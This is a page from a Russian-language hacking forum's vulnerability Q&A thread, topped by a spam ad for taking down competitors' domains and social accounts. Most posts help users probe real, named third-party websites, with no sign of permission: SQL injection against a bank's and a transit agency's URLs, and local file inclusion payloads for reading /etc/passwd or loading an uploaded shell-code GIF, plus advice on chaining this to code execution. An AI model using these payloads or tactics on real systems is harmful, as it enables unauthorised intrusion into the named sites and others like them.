УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 191 из 296

191

Опции темы

Поиск в этой теме

Опции просмотра

#1901

10.06.2017, 20:18

ACat

Guest

Сообщений: n/a

Провел на форуме:
60408

Репутация: 0

Цитата:

Сообщение от sepo

sepo said:
↑
всмысле??

там нету иньекции, там есть ошибка от спец-символа.

логика не срабатывает.

http://www.salaamsombank.com/pages.php?id=(1)

#1902

12.06.2017, 23:59

swat_

Новичок

Регистрация: 04.11.2009

Сообщений: 4

Провел на форуме:
233049

Репутация: 0

подскажите пожалуйста есть ли в этом коде уязвимость ,если есть ток как её воспроизвести

file.php?url=site.com%00 на такой запрос выдает ошибку

Warning: include_once(): Failed opening 'site.com' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

#1903

13.06.2017, 00:33

ACat

Guest

Сообщений: n/a

Провел на форуме:
60408

Репутация: 0

на сколько я понимаю - url=../../../etc/passwd%00

url=../../../var/www/site/upload/evil_avatar_with_shell_code.gif%00

при условии, что функция basename() нам ничего не портит.

#1904

13.06.2017, 00:45

swat_

Новичок

Регистрация: 04.11.2009

Сообщений: 4

Провел на форуме:
233049

Репутация: 0

file.php?url=../../../etc/passwd%00

Warning: include_once(): Failed opening 'passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23

#1905

13.06.2017, 01:23

ACat

Guest

Сообщений: n/a

Провел на форуме:
60408

Репутация: 0

http://www.php.su/functions/?basename

Код:

Code:

то бишь вектор сужается до дириктории, из которой выполняется сценарий.

#1906

13.06.2017, 01:34

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от swat_

swat_ said:
↑
подскажите пожалуйста есть ли в этом коде уязвимость

Уязвимость есть, но не шибко юзабельная. Если положить или изменить любой файл в этой директории, будет RCE.

Так же стоит посмотреть, можно ли там подцепить что-то интересное для дальнейшего развития атаки. Простейший пример:

Уязвим index.php. Рядом лежит upload.php который подключается в admin.php. В админку стоит логин/пароль, а upload.phpпроверяет наличие коннекта к базе и не может быть вызван напрямую. Следовательно, воспользовавшись локальным инклудом в index.php можно подцепить скрипт загрузки и залить что-то нехорошее

#1907

13.06.2017, 16:30

IvanPa

Guest

Сообщений: n/a

Провел на форуме:
390

Репутация: 0

всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?

#1908

13.06.2017, 17:55

ACat

Guest

Сообщений: n/a

Провел на форуме:
60408

Репутация: 0

Цитата:

Сообщение от IvanPa

IvanPa said:
↑
всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?

Для начала скажите какую платформу вы используете.

В зависимости от этого можно будет обрисовать потенциальные уязвимости.

Опаснотсть представляют не чаты, опасность представляют упущения в коде.

А за небольшую сумму проведу black box + white box аудит с подробным отчетом.

#1909

13.06.2017, 19:33

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

Что можно сделать тут?

Код:

Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092

#1910

13.06.2017, 23:13

ACat

Guest

Сообщений: n/a

Провел на форуме:
60408

Репутация: 0

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
Что можно сделать тут?

Код:

Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092

SERVER /index.php?id=176&no_cache=1&tx_ttnews[backPid]=176&tx_ttnews[tt_news]=169' or 1='1 HTTP/1.1

Host: www.rapibus.sto.ca

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Cookie:

Connection: close

Content-Length: 0